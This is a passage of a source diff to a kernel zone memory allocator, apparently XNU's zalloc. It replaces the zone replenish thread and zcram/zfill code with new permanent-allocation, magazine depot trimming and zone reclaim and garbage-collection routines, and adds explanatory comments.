- * that adds a minimum of 1 to the reserve size.
- *
- * Since the minimum amount you can add to a zone is 1 page, we'll use 16K (from ARM)
- * as the refill size on all platforms.
- *
- * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2,
- * zalloc_ext() will wake the replenish thread. The replenish thread runs
- * until at least REFILL_SIZE worth of free elements exist, before sleeping again.
- * In the meantime threads may continue to use the reserve until there are only REFILL_SIZE / 4
- * elements left. Below that point only the replenish threads themselves and the GC
- * thread may continue to use from the reserve.
- */
-static unsigned zone_replenish_loops;
-static unsigned zone_replenish_wakeups;
-static unsigned zone_replenish_wakeups_initiated;
-static unsigned zone_replenish_throttle_count;
-
-#define ZONE_REPLENISH_TARGET (16 * 1024)
-static unsigned zone_replenish_active = 0; /* count of zones currently replenishing */
-static unsigned zone_replenish_max_threads = 0;
+static void *
+_zalloc_permanent_large(size_t size, vm_offset_t mask)
+{
+       kern_return_t kr;
+       vm_offset_t addr;
 
-LCK_GRP_DECLARE(zone_replenish_lock_grp, "zone_replenish_lock");
-LCK_SPIN_DECLARE(zone_replenish_lock, &zone_replenish_lock_grp);
+       kr = kernel_memory_allocate(kernel_map, &addr, size, mask,
+           KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO,
+           VM_KERN_MEMORY_KALLOC);
+       if (kr != 0) {
+               panic("zalloc_permanent: unable to allocate %zd bytes (%d)",
+                   size, kr);
+       }
+       return (void *)addr;
+}
 
-__abortlike
-static void
-zone_replenish_panic(zone_t zone, kern_return_t kr)
+void *
+zalloc_permanent(vm_size_t size, vm_offset_t mask)
 {
-       panic_include_zprint = TRUE;
-#if CONFIG_ZLEAKS
-       if ((zleak_state & ZLEAK_STATE_ACTIVE)) {
-               panic_include_ztrace = TRUE;
-       }
-#endif /* CONFIG_ZLEAKS */
-       if (kr == KERN_NO_SPACE) {
-               zone_t zone_largest = zone_find_largest();
-               panic("zalloc: zone map exhausted while allocating from zone %s%s, "
-                   "likely due to memory leak in zone %s%s "
-                   "(%lu total bytes, %d elements allocated)",
-                   zone_heap_name(zone), zone->z_name,
-                   zone_heap_name(zone_largest), zone_largest->z_name,
-                   (unsigned long)zone_size_wired(zone_largest),
-                   zone_count_allocated(zone_largest));
+       if (size <= PAGE_SIZE) {
+               zone_t zone = &zone_array[ZONE_ID_PERMANENT];
+               return _zalloc_permanent(zone, size, mask);
        }
-       panic("zalloc: %s%s (%d elements) retry fail %d",
-           zone_heap_name(zone), zone->z_name,
-           zone_count_allocated(zone), kr);
+       return _zalloc_permanent_large(size, mask);
 }
 
-static void
-zone_replenish_locked(zone_t z, zalloc_flags_t flags, bool asynchronously)
+void *
+zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask)
 {
-       int kmaflags = KMA_KOBJECT | KMA_ZERO;
-       vm_offset_t space, alloc_size;
-       uint32_t retry = 0;
-       kern_return_t kr;
+       zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT];
+       return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask));
+}
 
-       if (z->noencrypt) {
-               kmaflags |= KMA_NOENCRYPT;
-       }
-       if (flags & Z_NOPAGEWAIT) {
-               kmaflags |= KMA_NOPAGEWAIT;
-       }
-       if (z->permanent) {
-               kmaflags |= KMA_PERMANENT;
-       }
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone GC / trimming
+#if !ZALLOC_TEST
 
-       for (;;) {
-               struct zone_page_metadata *page_meta = NULL;
+static thread_call_data_t zone_defrag_callout;
 
-               /*
-                * Try to allocate our regular chunk of pages,
-                * unless the system is under massive pressure
-                * and we're looking for more than 2 pages.
-                */
-               if (!z->percpu && z->alloc_pages > 2 && (vm_pool_low() || retry > 0)) {
-                       alloc_size = round_page(zone_elem_size(z));
-               } else {
-                       alloc_size = ptoa(z->alloc_pages);
-                       page_meta = zone_sequestered_page_get(z, &space);
-               }
+static void
+zone_reclaim_chunk(zone_t z, struct zone_page_metadata *meta, uint32_t free_count)
+{
+       vm_address_t page_addr;
+       vm_size_t    size_to_free;
+       uint32_t     bitmap_ref;
+       uint32_t     page_count;
+       bool         sequester = z->z_va_sequester && !z->z_destroyed;
 
-               unlock_zone(z);
+       zone_meta_queue_pop_native(z, &z->z_pageq_empty, &page_addr);
 
-#if CONFIG_ZLEAKS
-               /*
-                * Do the zone leak activation here because zleak_activate()
-                * may block, and can't be done on the way out.
-                */
-               if (__improbable(zleak_state & ZLEAK_STATE_ENABLED)) {
-                       if (!(zleak_state & ZLEAK_STATE_ACTIVE) &&
-                           zone_submaps_approx_size() >= zleak_global_tracking_threshold) {
-                               kr = zleak_activate();
-                               if (kr != KERN_SUCCESS) {
-                                       printf("Failed to activate live zone leak debugging (%d).\n", kr);
-                               }
-                       }
-               }
-#endif /* CONFIG_ZLEAKS */
+       page_count = meta->zm_chunk_len;
 
-               /*
-                * Trigger jetsams via the vm_pageout_garbage_collect thread if
-                * we're running out of zone memory
-                */
-               if (is_zone_map_nearing_exhaustion()) {
-                       thread_wakeup((event_t) &vm_pageout_garbage_collect);
+       if (meta->zm_alloc_size) {
+               zone_metadata_corruption(z, meta, "alloc_size");
+       }
+       if (z->z_percpu) {
+               if (page_count != 1) {
+                       zone_metadata_corruption(z, meta, "page_count");
                }
-
-               if (page_meta) {
-                       kr = zone_sequestered_page_populate(z, page_meta, space,
-                           alloc_size, kmaflags);
-               } else {
-                       if (z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP && z->kalloc_heap != KHEAP_ID_NONE) {
-                               kmaflags |= KMA_KHEAP;
-                       }
-                       kr = kernel_memory_allocate(submap_for_zone(z),
-                           &space, alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
+               size_to_free = ptoa(z->z_chunk_pages);
+               os_atomic_sub(&zones_phys_page_mapped_count,
+                   z->z_chunk_pages, relaxed);
+       } else {
+               if (page_count > z->z_chunk_pages) {
+                       zone_metadata_corruption(z, meta, "page_count");
                }
-
-#if !__LP64__
-               if (kr == KERN_NO_SPACE && z->allows_foreign) {
-                       /*
-                        * For zones allowing foreign pages, fallback to the kernel map
-                        */
-                       kr = kernel_memory_allocate(kernel_map, &space,
-                           alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
+               if (page_count < z->z_chunk_pages) {
+                       /* Dequeue non populated VA from z_pageq_va */
+                       zone_meta_remqueue(z, meta + page_count);
                }
-#endif
+               size_to_free = ptoa(page_count);
+               os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed);
+       }
 
-               if (kr == KERN_SUCCESS) {
-                       break;
-               }
+       zone_counter_sub(z, z_elems_free, free_count);
+       zone_counter_sub(z, z_elems_avail, free_count);
+       zone_counter_sub(z, z_wired_empty, page_count);
+       zone_counter_sub(z, z_wired_cur, page_count);
+       if (z->z_elems_free_min < free_count) {
+               z->z_elems_free_min = 0;
+       } else {
+               z->z_elems_free_min -= free_count;
+       }
+       if (z->z_elems_free_max < free_count) {
+               z->z_elems_free_max = 0;
+       } else {
+               z->z_elems_free_max -= free_count;
+       }
 
-               if (flags & Z_NOPAGEWAIT) {
-                       lock_zone(z);
-                       return;
+       bitmap_ref = 0;
+       if (sequester) {
+               if (meta->zm_inline_bitmap) {
+                       for (int i = 0; i < meta->zm_chunk_len; i++) {
+                               meta[i].zm_bitmap = 0;
+                       }
+               } else {
+                       bitmap_ref = meta->zm_bitmap;
+                       meta->zm_bitmap = 0;
                }
-
-               if (asynchronously) {
-                       assert_wait_timeout(&z->prio_refill_count,
-                           THREAD_UNINT, 1, 100 * NSEC_PER_USEC);
-                       thread_block(THREAD_CONTINUE_NULL);
-               } else if (++retry == 3) {
-                       zone_replenish_panic(z, kr);
+               meta->zm_chunk_len = 0;
+       } else {
+               if (!meta->zm_inline_bitmap) {
+                       bitmap_ref = meta->zm_bitmap;
                }
-
-               lock_zone(z);
+               zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages);
+               bzero(meta, sizeof(*meta) * z->z_chunk_pages);
        }
 
-       zcram_and_lock(z, space, alloc_size);
+       zone_unlock(z);
 
-#if CONFIG_ZLEAKS
-       if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) {
-               if (!z->zleak_on &&
-                   zone_size_wired(z) >= zleak_per_zone_tracking_threshold) {
-                       z->zleak_on = true;
-               }
+       if (bitmap_ref) {
+               zone_bits_free(bitmap_ref);
        }
-#endif /* CONFIG_ZLEAKS */
-}
-
-/*
- * High priority VM privileged thread used to asynchronously refill a given zone.
- * These are needed for data structures used by the lower level VM itself. The
- * replenish thread maintains a reserve of elements, so that the VM will never
- * block in the zone allocator.
- */
-__dead2
-static void
-zone_replenish_thread(void *_z, wait_result_t __unused wr)
-{
-       zone_t z = _z;
 
-       current_thread()->options |= (TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV);
-
-       for (;;) {
-               lock_zone(z);
-               assert(z->z_self == z);
-               assert(z->zone_replenishing);
-               assert(z->prio_refill_count != 0);
+       /* Free the pages for metadata and account for them */
+#if KASAN_ZALLOC
+       kasan_poison_range(page_addr, size_to_free, ASAN_VALID);
+#endif
+#if VM_MAX_TAG_ZONES
+       if (z->tags) {
+               ztMemoryRemove(z, page_addr, size_to_free);
+       }
+#endif /* VM_MAX_TAG_ZONES */
 
-               while (z->countfree < z->prio_refill_count) {
-                       assert(!z->expanding_no_vm_priv);
-                       assert(!z->expanding_vm_priv);
+       if (sequester) {
+               kernel_memory_depopulate(zone_submap(z), page_addr,
+                   size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE);
+       } else {
+               kmem_free(zone_submap(z), page_addr, ptoa(z->z_chunk_pages));
+       }
 
-                       zone_replenish_locked(z, Z_WAITOK, true);
+       /*
+        * Freeing memory can itself require allocating memory (for example
+        * vm map entries to represent holes).
+        *
+        * If there are any active replenish threads, we need to let them work
+        * while we hold no locks. We only do this right after freeing memory,
+        * which is when they have the best chance of finding fresh pages.
+        */
+       zone_replenish_wait_if_needed();
 
-                       assert(z->z_self == z);
-                       zone_replenish_loops++;
-               }
+       thread_yield_to_preemption();
 
-               /* Wakeup any potentially throttled allocations. */
-               thread_wakeup(z);
+       zone_lock(z);
 
-               assert_wait(&z->prio_refill_count, THREAD_UNINT);
+       if (sequester) {
+               zone_meta_queue_push(z, &z->z_pageq_va, meta);
+       }
+}
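+
+/*
+ * Note on the two exit paths above: when VA sequestering is in effect the
+ * chunk's physical pages are depopulated but its metadata and virtual
+ * range are kept and pushed back on z_pageq_va for reuse; otherwise the
+ * whole mapping is handed back to the zone submap with kmem_free().
+ */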
 
-               /*
-                * We finished refilling the zone, so decrement the active count
-                * and wake up any waiting GC threads.
-                */
-               lck_spin_lock(&zone_replenish_lock);
-               assert(zone_replenish_active > 0);
-               if (--zone_replenish_active == 0) {
-                       thread_wakeup((event_t)&zone_replenish_active);
-               }
-               lck_spin_unlock(&zone_replenish_lock);
+static uint16_t
+zone_reclaim_elements(zone_t z, uint16_t *count, zone_element_t *elems)
+{
+       uint16_t n = *count;
 
-               z->zone_replenishing = false;
-               unlock_zone(z);
+       z_debug_assert(n <= zc_mag_size());
 
-               thread_block(THREAD_CONTINUE_NULL);
-               zone_replenish_wakeups++;
+       for (uint16_t i = 0; i < n; i++) {
+               zone_element_t ze = elems[i];
+               elems[i].ze_value = 0;
+               zfree_drop(z, zone_element_validate(z, ze), ze, false);
        }
+
+       *count = 0;
+       return n;
 }
 
-void
-zone_prio_refill_configure(zone_t z)
+static uint16_t
+zone_reclaim_recirc_magazine(zone_t z, struct zone_depot *mags)
 {
-       thread_t th;
-       kern_return_t tres;
+       zone_magazine_t mag = STAILQ_FIRST(&z->z_recirc);
 
-       lock_zone(z);
-       assert(!z->prio_refill_count && !z->destructible);
-       z->prio_refill_count = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z));
-       z->zone_replenishing = true;
-       unlock_zone(z);
+       STAILQ_REMOVE_HEAD(&z->z_recirc, zm_link);
+       STAILQ_INSERT_TAIL(mags, mag, zm_link);
+       zone_counter_sub(z, z_recirc_cur, 1);
 
-       lck_spin_lock(&zone_replenish_lock);
-       ++zone_replenish_max_threads;
-       ++zone_replenish_active;
-       lck_spin_unlock(&zone_replenish_lock);
-       OSMemoryBarrier();
+       z_debug_assert(mag->zm_cur == zc_mag_size());
 
-       tres = kernel_thread_start_priority(zone_replenish_thread, z,
-           MAXPRI_KERNEL, &th);
-       if (tres != KERN_SUCCESS) {
-               panic("zone_prio_refill_configure, thread create: 0x%x", tres);
+       for (uint16_t i = 0; i < zc_mag_size(); i++) {
+               zone_element_t ze = mag->zm_elems[i];
+               mag->zm_elems[i].ze_value = 0;
+               zfree_drop(z, zone_element_validate(z, ze), ze, true);
        }
 
-       thread_deallocate(th);
+       mag->zm_cur = 0;
+
+       return zc_mag_size();
 }
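+
+/*
+ * Both helpers above hand cached elements back to the zone's per-chunk
+ * freelists through zfree_drop(); the recirc variant additionally unlinks
+ * a full magazine from the recirculation depot and parks the emptied
+ * magazine on the caller's list so it can later be freed with
+ * zone_magazine_free().
+ */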
 
 static void
-zone_randomize_freelist(zone_t zone, struct zone_page_metadata *meta,
-    vm_offset_t size, zone_addr_kind_t kind, unsigned int *entropy_buffer)
-{
-       const vm_size_t elem_size = zone_elem_size(zone);
-       vm_offset_t     left, right, head, base;
-       vm_offset_t     element;
-
-       left  = ZONE_PAGE_FIRST_OFFSET(kind);
-       right = size - ((size - left) % elem_size);
-       head  = 0;
-       base  = zone_meta_to_addr(meta, kind);
-
-       while (left < right) {
-               if (zone_leaks_scan_enable || __improbable(zone->tags) ||
-                   random_bool_gen_bits(&zone_bool_gen, entropy_buffer, MAX_ENTROPY_PER_ZCRAM, 1)) {
-                       element = base + left;
-                       left += elem_size;
-               } else {
-                       right -= elem_size;
-                       element = base + right;
-               }
+zone_depot_trim(zone_cache_t zc, struct zone_depot *head)
+{
+       zone_magazine_t mag;
+
+       if (zc->zc_depot_cur == 0 ||
+           2 * (zc->zc_depot_cur + 1) * zc_mag_size() <= zc->zc_depot_max) {
+               return;
+       }
 
-               vm_offset_t *primary  = (vm_offset_t *)element;
-               vm_offset_t *backup   = get_backup_ptr(elem_size, primary);
+       zone_depot_lock(zc);
 
-               *primary = *backup = head ^ zp_nopoison_cookie;
-               head = element;
+       while (zc->zc_depot_cur &&
+           2 * (zc->zc_depot_cur + 1) * zc_mag_size() > zc->zc_depot_max) {
+               mag = STAILQ_FIRST(&zc->zc_depot);
+               STAILQ_REMOVE_HEAD(&zc->zc_depot, zm_link);
+               STAILQ_INSERT_TAIL(head, mag, zm_link);
+               zc->zc_depot_cur--;
        }
 
-       meta->zm_freelist_offs = (uint16_t)(head - base);
+       zone_depot_unlock(zc);
 }
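+
+/*
+ * The trim above only kicks in once the per-CPU depot holds more than
+ * about half of its zc_depot_max element budget, and it stops as soon as
+ * the depot is back under that mark, so lightly used caches keep their
+ * magazines and only clearly oversized depots get drained.
+ */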
 
-/*
- *     Cram the given memory into the specified zone. Update the zone page count accordingly.
+__enum_decl(zone_reclaim_mode_t, uint32_t, {
+       ZONE_RECLAIM_TRIM,
+       ZONE_RECLAIM_DRAIN,
+       ZONE_RECLAIM_DESTROY,
+});
+
+/*!
+ * @function zone_reclaim
+ *
+ * @brief
+ * Drains or trims the zone.
+ *
+ * @discussion
+ * Draining the zone frees all of its elements.
+ *
+ * Trimming the zone tries to respect the working set size, and avoids draining
+ * the depot when it's not necessary.
+ *
+ * @param z             The zone to reclaim from
+ * @param mode          The purpose of this reclaim.
  */
 static void
-zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size)
+zone_reclaim(zone_t z, zone_reclaim_mode_t mode)
 {
-       unsigned int entropy_buffer[MAX_ENTROPY_PER_ZCRAM] = { 0 };
-       struct zone_page_metadata *meta;
-       zone_addr_kind_t kind;
-       uint32_t pg_count = (uint32_t)atop(size);
-       uint32_t zindex = zone_index(zone);
-       uint32_t free_count;
-       uint16_t empty_freelist_offs = PAGE_METADATA_EMPTY_FREELIST;
-
-       /* Basic sanity checks */
-       assert(zone != ZONE_NULL && newmem != (vm_offset_t)0);
-       assert((newmem & PAGE_MASK) == 0);
-       assert((size & PAGE_MASK) == 0);
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+       zone_magazine_t mag, tmp;
 
-       KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_START,
-           zindex, size);
+       zone_lock(z);
 
-       kind = zone_addr_kind(newmem, size);
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZCRAM) {
-               kprintf("zcram(%p[%s%s], 0x%lx%s, 0x%lx)\n", zone,
-                   zone_heap_name(zone), zone->z_name, (uintptr_t)newmem,
-                   kind == ZONE_ADDR_FOREIGN ? "[F]" : "", (uintptr_t)size);
-       }
-#endif /* DEBUG || DEVELOPMENT */
+       if (mode == ZONE_RECLAIM_DESTROY) {
+               if (!z->z_destructible || z->z_pcpu_cache ||
+                   z->z_elems_rsv || z->z_allows_foreign) {
+                       panic("zdestroy: Zone %s%s isn't destructible",
+                           zone_heap_name(z), z->z_name);
+               }
 
-       /*
-        * Initialize the metadata for all pages. We dont need the zone lock
-        * here because we are not manipulating any zone related state yet.
-        *
-        * This includes randomizing the freelists as the metadata isn't
-        * published yet.
-        */
+               if (!z->z_self || z->z_expander || z->z_expander_vm_priv ||
+                   z->z_async_refilling || z->z_expanding_wait) {
+                       panic("zdestroy: Zone %s%s in an invalid state for destruction",
+                           zone_heap_name(z), z->z_name);
+               }
 
-       if (kind == ZONE_ADDR_NATIVE) {
+#if !KASAN_ZALLOC
                /*
-                * We're being called by zfill,
-                * zone_replenish_thread or vm_page_more_fictitious,
+                * Unset the valid bit. We'll hit an assert failure on further
+                * operations on this zone, until zinit() is called again.
                 *
-                * which will only either allocate a single page, or `alloc_pages`
-                * worth.
+                * Leave the zone valid for KASan as we will see zfree's on
+                * quarantined free elements even after the zone is destroyed.
                 */
-               assert(pg_count <= zone->alloc_pages);
-
+               z->z_self = NULL;
+#endif
+               z->z_destroyed = true;
+       } else if (z->z_destroyed) {
+               return zone_unlock(z);
+       } else if (z->z_replenishes && z->z_async_refilling) {
                /*
-                * Make sure the range of metadata entries we're about to init
-                * have proper physical backing, then initialize them.
+                * If the zone is replenishing, leave it alone.
                 */
-               meta = zone_meta_from_addr(newmem, kind);
-               zone_meta_populate(meta, meta + pg_count);
+               return zone_unlock(z);
+       }
 
-               if (zone->permanent) {
-                       empty_freelist_offs = 0;
+       if (z->z_pcpu_cache) {
+               if (mode != ZONE_RECLAIM_TRIM) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zc->zc_depot_max /= 2;
+                       }
+               } else {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               if (zc->zc_depot_max > 0) {
+                                       zc->zc_depot_max--;
+                               }
+                       }
                }
 
-               meta[0] = (struct zone_page_metadata){
-                       .zm_index         = zindex,
-                       .zm_page_count    = pg_count,
-                       .zm_percpu        = zone->percpu,
-                       .zm_freelist_offs = empty_freelist_offs,
-               };
+               zone_unlock(z);
 
-               for (uint32_t i = 1; i < pg_count; i++) {
-                       meta[i] = (struct zone_page_metadata){
-                               .zm_index          = zindex,
-                               .zm_page_count     = i,
-                               .zm_percpu         = zone->percpu,
-                               .zm_secondary_page = true,
-                               .zm_freelist_offs  = empty_freelist_offs,
-                       };
+               if (mode == ZONE_RECLAIM_TRIM) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zone_depot_trim(zc, &mags);
+                       }
+               } else {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               zone_depot_lock(zc);
+                               STAILQ_CONCAT(&mags, &zc->zc_depot);
+                               zc->zc_depot_cur = 0;
+                               zone_depot_unlock(zc);
+                       }
                }
 
-               if (!zone->permanent) {
-                       zone_randomize_freelist(zone, meta,
-                           zone->percpu ? PAGE_SIZE : size, kind, entropy_buffer);
+               zone_lock(z);
+
+               uint32_t freed = 0;
+
+               STAILQ_FOREACH(mag, &mags, zm_link) {
+                       freed += zone_reclaim_elements(z,
+                           &mag->zm_cur, mag->zm_elems);
+
+                       if (freed >= zc_free_batch_size) {
+                               z->z_elems_free_min += freed;
+                               z->z_elems_free_max += freed;
+                               z->z_elems_free += freed;
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                       }
                }
-       } else {
-               if (!zone->allows_foreign || !from_foreign_range(newmem, size)) {
-                       panic("zcram_and_lock: foreign memory [%lx] being crammed is "
-                           "outside of foreign range", (uintptr_t)newmem);
+
+               if (mode == ZONE_RECLAIM_DESTROY) {
+                       zpercpu_foreach(zc, z->z_pcpu_cache) {
+                               freed += zone_reclaim_elements(z,
+                                   &zc->zc_alloc_cur, zc->zc_alloc_elems);
+                               freed += zone_reclaim_elements(z,
+                                   &zc->zc_free_cur, zc->zc_free_elems);
+                       }
+
+                       z->z_elems_free_wss = 0;
+                       z->z_elems_free_min = 0;
+                       z->z_elems_free_max = 0;
+                       z->z_contention_cur = 0;
+                       z->z_contention_wma = 0;
+               } else {
+                       z->z_elems_free_min += freed;
+                       z->z_elems_free_max += freed;
+               }
+               z->z_elems_free += freed;
+       }
+
+       for (;;) {
+               struct zone_page_metadata *meta;
+               uint32_t count, goal, freed = 0;
+
+               goal = z->z_elems_rsv;
+               if (mode == ZONE_RECLAIM_TRIM) {
+                       /*
+                        * When trimming, only free elements in excess
+                        * of the working set estimate.
+                        *
+                        * However, if the working set estimate is clearly
+                        * growing, ignore the estimate: the next working set
+                        * update will grow it, and we want to avoid churn
+                        * in the meantime.
+                        */
+                       goal = MAX(goal, MAX(z->z_elems_free_wss,
+                           z->z_elems_free - z->z_elems_free_min));
+
+                       /*
+                        * Add some slop to account for "the last partial chunk in flight"
+                        * so that we do not deplete the recirculation depot too harshly.
+                        */
+                       goal += z->z_chunk_elems / 2;
+               }
+
+               if (z->z_elems_free <= goal) {
+                       break;
                }
 
                /*
-                * We cannot support elements larger than page size for foreign
-                * memory because we put metadata on the page itself for each
-                * page of foreign memory.
+                * If we're above target, but we have no free page, then drain
+                * the recirculation depot until we get a free chunk or exhaust
+                * the depot.
                 *
-                * We need to do this in order to be able to reach the metadata
-                * when any element is freed.
+                * This is rather abrupt, but it also tends to reduce
+                * fragmentation, and the zone will simply import fresh
+                * chunks over time if it needs them again.
                 */
-               assert(!zone->percpu && !zone->permanent);
-               assert(zone_elem_size(zone) <= PAGE_SIZE - sizeof(struct zone_page_metadata));
+               while (z->z_recirc_cur) {
+                       if (z->z_recirc_cur * zc_mag_size() <= goal &&
+                           !zone_pva_is_null(z->z_pageq_empty)) {
+                               break;
+                       }
+                       if (freed >= zc_free_batch_size) {
+                               zone_unlock(z);
+                               thread_yield_to_preemption();
+                               zone_lock(z);
+                               freed = 0;
+                               /* we dropped the lock, needs to reassess */
+                               continue;
+                       }
+                       freed += zone_reclaim_recirc_magazine(z, &mags);
+               }
 
-               bzero((void *)newmem, size);
+               if (zone_pva_is_null(z->z_pageq_empty)) {
+                       break;
+               }
 
-               for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) {
-                       meta = (struct zone_page_metadata *)(newmem + offs);
-                       *meta = (struct zone_page_metadata){
-                               .zm_index         = zindex,
-                               .zm_page_count    = 1,
-                               .zm_freelist_offs = empty_freelist_offs,
-                       };
-                       meta->zm_foreign_cookie[0] = ZONE_FOREIGN_COOKIE;
-                       zone_randomize_freelist(zone, meta, PAGE_SIZE, kind,
-                           entropy_buffer);
+               meta  = zone_pva_to_meta(z->z_pageq_empty);
+               count = (uint32_t)ptoa(meta->zm_chunk_len) / zone_elem_size(z);
+
+               if (z->z_elems_free - count < goal) {
+                       break;
                }
+
+               zone_reclaim_chunk(z, meta, count);
        }
 
-#if VM_MAX_TAG_ZONES
-       if (__improbable(zone->tags)) {
-               assert(kind == ZONE_ADDR_NATIVE && !zone->percpu);
-               ztMemoryAdd(zone, newmem, size);
+       zone_unlock(z);
+
+       STAILQ_FOREACH_SAFE(mag, &mags, zm_link, tmp) {
+               zone_magazine_free(mag);
        }
-#endif /* VM_MAX_TAG_ZONES */
+}
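+
+/*
+ * To summarize the trim policy above: in ZONE_RECLAIM_TRIM mode the zone
+ * is never drawn below max(z_elems_rsv, working set estimate) plus half a
+ * chunk of slop; DRAIN and DESTROY ignore the estimate, flush the per-CPU
+ * depots first (and, for DESTROY, the per-CPU alloc/free magazines too),
+ * and then release empty chunks down to z_elems_rsv.
+ */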
 
+static void
+zone_reclam_all(zone_reclaim_mode_t mode)
+{
        /*
-        * Insert the initialized pages / metadatas into the right lists.
+        * Start with VA-sequestered zones, since depopulating their pages
+        * does not need to allocate vm map entries for holes, which gives
+        * memory back to the system faster.
         */
-
-       lock_zone(zone);
-       assert(zone->z_self == zone);
-
-       zone->page_count += pg_count;
-       if (zone->page_count_hwm < zone->page_count) {
-               zone->page_count_hwm = zone->page_count;
+       zone_foreach(z) {
+               if (z == zc_magazine_zone) {
+                       continue;
+               }
+               if (z->z_va_sequester && z->collectable) {
+                       zone_reclaim(z, mode);
+               }
        }
-       os_atomic_add(&zones_phys_page_count, pg_count, relaxed);
 
-       if (kind == ZONE_ADDR_NATIVE) {
-               os_atomic_add(&zones_phys_page_mapped_count, pg_count, relaxed);
-               if (zone->permanent) {
-                       zone_meta_queue_push(zone, &zone->pages_intermediate, meta, kind);
-               } else {
-                       zone_meta_queue_push(zone, &zone->pages_all_free, meta, kind);
-                       zone->allfree_page_count += meta->zm_page_count;
+       zone_foreach(z) {
+               if (z == zc_magazine_zone) {
+                       continue;
                }
-               free_count = zone_elem_count(zone, size, kind);
-               zone->countfree  += free_count;
-               zone->countavail += free_count;
-       } else {
-               free_count = zone_elem_count(zone, PAGE_SIZE, kind);
-               for (vm_offset_t offs = 0; offs < size; offs += PAGE_SIZE) {
-                       meta = (struct zone_page_metadata *)(newmem + offs);
-                       zone_meta_queue_push(zone, &zone->pages_any_free_foreign, meta, kind);
-                       zone->countfree  += free_count;
-                       zone->countavail += free_count;
+               if (!z->z_va_sequester && z->collectable) {
+                       zone_reclaim(z, mode);
                }
        }
 
-       KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_END, zindex);
+       zone_reclaim(zc_magazine_zone, mode);
 }
 
 void
-zcram(zone_t zone, vm_offset_t newmem, vm_size_t size)
-{
-       zcram_and_lock(zone, newmem, size);
-       unlock_zone(zone);
-}
-
-/*
- * Fill a zone with enough memory to contain at least nelem elements.
- * Return the number of elements actually put into the zone, which may
- * be more than the caller asked for since the memory allocation is
- * rounded up to the next zone allocation size.
- */
-int
-zfill(
-       zone_t  zone,
-       int     nelem)
+zone_gc(zone_gc_level_t level)
 {
-       kern_return_t kr;
-       vm_offset_t   memory;
-
-       vm_size_t alloc_size = ptoa(zone->alloc_pages);
-       vm_size_t nalloc_inc = zone_elem_count(zone, alloc_size, ZONE_ADDR_NATIVE);
-       vm_size_t nalloc = 0, goal = MAX(0, nelem);
-       int kmaflags = KMA_KOBJECT | KMA_ZERO;
-
-       if (zone->noencrypt) {
-               kmaflags |= KMA_NOENCRYPT;
-       }
-
-       assert(!zone->allows_foreign && !zone->permanent);
+       zone_reclaim_mode_t mode;
 
-       /*
-        * Trigger jetsams via the vm_pageout_garbage_collect thread if we're
-        * running out of zone memory
-        */
-       if (is_zone_map_nearing_exhaustion()) {
-               thread_wakeup((event_t) &vm_pageout_garbage_collect);
+       switch (level) {
+       case ZONE_GC_TRIM:
+               mode = ZONE_RECLAIM_TRIM;
+               break;
+       case ZONE_GC_DRAIN:
+               mode = ZONE_RECLAIM_DRAIN;
+               break;
+       case ZONE_GC_JETSAM:
+               kill_process_in_largest_zone();
+               mode = ZONE_RECLAIM_TRIM;
+               break;
        }
 
-       if (zone->va_sequester) {
-               lock_zone(zone);
-
-               do {
-                       struct zone_page_metadata *page_meta;
-                       page_meta = zone_sequestered_page_get(zone, &memory);
-                       if (NULL == page_meta) {
-                               break;
-                       }
-                       unlock_zone(zone);
-
-                       kr = zone_sequestered_page_populate(zone, page_meta,
-                           memory, alloc_size, kmaflags);
-                       if (KERN_SUCCESS != kr) {
-                               goto out_nolock;
-                       }
-
-                       zcram_and_lock(zone, memory, alloc_size);
-                       nalloc += nalloc_inc;
-               } while (nalloc < goal);
-
-               unlock_zone(zone);
-       }
+       current_thread()->options |= TH_OPT_ZONE_PRIV;
+       lck_mtx_lock(&zone_gc_lock);
 
-out_nolock:
-       while (nalloc < goal) {
-               kr = kernel_memory_allocate(submap_for_zone(zone), &memory,
-                   alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE);
-               if (kr != KERN_SUCCESS) {
-                       printf("%s: kernel_memory_allocate() of %lu bytes failed\n",
-                           __func__, (unsigned long)(nalloc * alloc_size));
-                       break;
-               }
+       zone_reclam_all(mode);
 
-               zcram(zone, memory, alloc_size);
-               nalloc += nalloc_inc;
+       if (level == ZONE_GC_JETSAM && zone_map_nearing_exhaustion()) {
+               /*
+                * If we possibly killed a process, but we're still critical,
+                * we need to drain harder.
+                */
+               zone_reclam_all(ZONE_RECLAIM_DRAIN);
        }
 
-       return (int)nalloc;
+       lck_mtx_unlock(&zone_gc_lock);
+       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
 }
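+
+/*
+ * zone_gc() is serialized by zone_gc_lock, and the calling thread is
+ * temporarily marked TH_OPT_ZONE_PRIV so that, like the replenish threads,
+ * it can keep drawing on zone reserves while it is busy giving memory
+ * back.
+ */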
 
-/*
- * We're being very conservative here and picking a value of 95%. We might need to lower this if
- * we find that we're not catching the problem and are still hitting zone map exhaustion panics.
- */
